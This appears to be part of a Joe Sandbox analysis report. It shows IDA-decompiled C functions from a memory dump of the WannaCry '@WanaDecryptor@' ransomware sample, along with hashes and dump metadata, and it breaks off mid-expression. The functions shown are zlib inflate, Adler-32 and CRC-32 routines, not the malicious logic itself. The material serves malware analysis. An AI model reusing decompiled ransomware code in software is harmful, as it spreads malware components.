                                                      									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                      									_t176 = _t155 >> 3;
                                                      									if(_t176 < _t219) {
                                                      										_t219 = _t176;
                                                      									}
                                                      									_t177 =  *((intOrPtr*)(_t331 + 0x38));
                                                      									_t317 = _t316 - _t219;
                                                      									 *(_t177 + 0x20) = _t270;
                                                      									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
                                                      									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
                                                      									 *_t287 = _t317;
                                                      									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
                                                      									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
                                                      									return 0;
                                                      								} else {
                                                      									continue;
                                                      								}
                                                      							} else {
                                                      								while((_t180 & 0x00000040) == 0) {
                                                      									_t252 = ( *(0x41a260 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
                                                      									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
                                                      									_t291 = _t291 + _t252 * 8;
                                                      									_t270 = _t270 >>  *(_t291 + 1);
                                                      									_t155 = _t155;
                                                      									 *(_t331 + 0x28) = 0;
                                                      									if((_t180 & 0x00000010) == 0) {
                                                      										continue;
                                                      									} else {
                                                      										goto L18;
                                                      									}
                                                      									goto L51;
                                                      								}
                                                      								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
                                                      								 *(_t249 + 0x18) = "invalid distance code";
                                                      								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                      								_t305 = _t155 >> 3;
                                                      								if(_t305 >=  *(_t331 + 0x2c)) {
                                                      									goto L49;
                                                      								}
                                                      								goto L50;
                                                      							}
                                                      						} else {
                                                      							while((_t173 & 0x00000040) == 0) {
                                                      								_t267 = ( *(0x41a260 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
                                                      								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
                                                      								_t286 = _t286 + _t267 * 8;
                                                      								if(0 == 0) {
                                                      									goto L35;
                                                      								} else {
                                                      									_t270 = _t270 >>  *(_t286 + 1);
                                                      									_t155 = _t155;
                                                      									 *(_t331 + 0x28) = 0;
                                                      									if((_t173 & 0x00000010) == 0) {
                                                      										continue;
                                                      									} else {
                                                      										goto L12;
                                                      									}
                                                      								}
                                                      								goto L51;
                                                      							}
                                                      							if((_t173 & 0x00000020) == 0) {
                                                      								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
                                                      								 *(_t249 + 0x18) = "invalid literal/length code";
                                                      								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                      								_t305 = _t155 >> 3;
                                                      								if(_t305 >=  *(_t331 + 0x2c)) {
                                                      									L49:
                                                      									_t305 =  *(_t331 + 0x2c);
                                                      								}
                                                      								L50:
                                                      								_t193 =  *((intOrPtr*)(_t331 + 0x38));
                                                      								_t325 = _t316 - _t305;
                                                      								 *(_t193 + 0x20) = _t270;
                                                      								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
                                                      								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
                                                      								 *_t249 = _t325;
                                                      								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
                                                      								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
                                                      								return 0xfffffffd;
                                                      							} else {
                                                      								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
                                                      								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
                                                      								_t200 = _t155 >> 3;
                                                      								if(_t200 < _t261) {
                                                      									_t261 = _t200;
                                                      								}
                                                      								_t201 =  *((intOrPtr*)(_t331 + 0x38));
                                                      								_t326 = _t316 - _t261;
                                                      								 *(_t201 + 0x20) = _t270;
                                                      								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
                                                      								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
                                                      								 *_t313 = _t326;
                                                      								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
                                                      								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
                                                      								return 1;
                                                      							}
                                                      						}
                                                      					}
                                                      					L51:
                                                      				}
                                                      			}

                                                      0x0040fe66
                                                      0x00000000
                                                      0x0040fe6c
                                                      0x00000000
                                                      0x0040fe66
                                                      0x0040fc70
                                                      0x0040fc70
                                                      0x0040fc85
                                                      0x0040fc89
                                                      0x0040fc8c
                                                      0x0040fc91
                                                      0x00000000
                                                      0x0040fc97
                                                      0x0040fc9c
                                                      0x0040fc9e
                                                      0x0040fca0
                                                      0x0040fca7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040fca7
                                                      0x00000000
                                                      0x0040fc91
                                                      0x0040fec7
                                                      0x0040ff1f
                                                      0x0040ff2a
                                                      0x0040ff33
                                                      0x0040ff3d
                                                      0x0040ff42
                                                      0x0040ff44
                                                      0x0040ff44
                                                      0x0040ff44
                                                      0x0040ff48
                                                      0x0040ff48
                                                      0x0040ff4c
                                                      0x0040ff4e
                                                      0x0040ff5c
                                                      0x0040ff68
                                                      0x0040ff6f
                                                      0x0040ff73
                                                      0x0040ff76
                                                      0x0040ff85
                                                      0x0040fec9
                                                      0x0040fec9
                                                      0x0040fed4
                                                      0x0040fed8
                                                      0x0040fedd
                                                      0x0040fedf
                                                      0x0040fedf
                                                      0x0040fee1
                                                      0x0040fee5
                                                      0x0040fee7
                                                      0x0040fef3
                                                      0x0040ff01
                                                      0x0040ff06
                                                      0x0040ff0c
                                                      0x0040ff0f
                                                      0x0040ff1e
                                                      0x0040ff1e
                                                      0x0040fec7
                                                      0x0040fc6e
                                                      0x00000000
                                                      0x0040fc58

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                                      • Instruction ID: 2ca3a7e0973b0a9ded1865a7ec8cc067e044c270efaf411a13bb96b1b7e56096
                                                      • Opcode Fuzzy Hash: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                                      • Instruction Fuzzy Hash: DDD1B73560C3418FC718CF2CD59016ABBE1EB99310F19497EE9DAA3756C734E819CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00410180() {
                                                      				unsigned int _t28;
                                                      				unsigned int _t35;
                                                      				signed int _t38;
                                                      				signed int _t40;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      				signed int _t43;
                                                      				signed int _t44;
                                                      				signed int _t45;
                                                      				signed int _t46;
                                                      				signed int _t47;
                                                      				signed int _t48;
                                                      				signed int _t49;
                                                      				signed int _t50;
                                                      				signed int _t51;
                                                      				signed int _t52;
                                                      				signed int _t53;
                                                      				signed int _t54;
                                                      				unsigned int _t96;
                                                      				signed int _t97;
                                                      				unsigned int _t114;
                                                      				signed int _t117;
                                                      				void* _t119;
                                                      
                                                      				_t114 =  *(_t119 + 0xc);
                                                      				_t96 =  *(_t119 + 0xc);
                                                      				_t38 = _t96 & 0x0000ffff;
                                                      				_t97 = _t96 >> 0x10;
                                                      				if(_t114 != 0) {
                                                      					_t35 =  *(_t119 + 0x18);
                                                      					if(_t35 > 0) {
                                                      						do {
                                                      							_t28 = _t35;
                                                      							if(_t35 >= 0x15b0) {
                                                      								_t28 = 0x15b0;
                                                      							}
                                                      							_t35 = _t35 - _t28;
                                                      							if(_t28 >= 0x10) {
                                                      								_t117 = _t28 >> 4;
                                                      								_t28 = _t28 + ( ~_t117 << 4);
                                                      								do {
                                                      									_t114 = _t114 + 0x10;
                                                      									_t40 = _t38;
                                                      									_t41 = _t40;
                                                      									_t42 = _t41;
                                                      									_t43 = _t42;
                                                      									_t44 = _t43;
                                                      									_t45 = _t44;
                                                      									_t46 = _t45;
                                                      									_t47 = _t46;
                                                      									_t48 = _t47;
                                                      									_t49 = _t48;
                                                      									_t50 = _t49;
                                                      									_t51 = _t50;
                                                      									_t52 = _t51;
                                                      									_t53 = _t52;
                                                      									_t54 = _t53;
                                                      									_t38 = _t54;
                                                      									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
                                                      									_t117 = _t117 - 1;
                                                      								} while (_t117 != 0);
                                                      							}
                                                      							if(_t28 != 0) {
                                                      								do {
                                                      									_t38 = _t38;
                                                      									_t114 = _t114 + 1;
                                                      									_t97 = _t97 + _t38;
                                                      									_t28 = _t28 - 1;
                                                      								} while (_t28 != 0);
                                                      							}
                                                      							_t38 = _t38 % 0xfff1;
                                                      							_t97 = _t97 % 0xfff1;
                                                      						} while (_t35 > 0);
                                                      					}
                                                      					return _t97 << 0x00000010 | _t38;
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                      • Instruction ID: 6bb151cab00cdc0290d3db98aa961ff277c67549bb944e7b7c7e1e2eea59e94c
                                                      • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                      • Instruction Fuzzy Hash: A1314D3374558203F71DCA2F8CA12FAEAD34FD522872DD57E99C987356ECFA48564104
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040FF90(signed int _a4, intOrPtr _a8, unsigned int _a12) {
                                                      				signed int _t29;
                                                      				intOrPtr _t76;
                                                      				unsigned int _t115;
                                                      				unsigned int _t118;
                                                      
                                                      				_t76 = _a8;
                                                      				if(_t76 != 0) {
                                                      					_t118 = _a12;
                                                      					_t29 =  !_a4;
                                                      					if(_t118 >= 8) {
                                                      						_t115 = _t118 >> 3;
                                                      						do {
                                                      							_t118 = _t118 - 8;
                                                      							_t29 = ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 
0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( 
*(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 
0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff 
^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 
& 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) 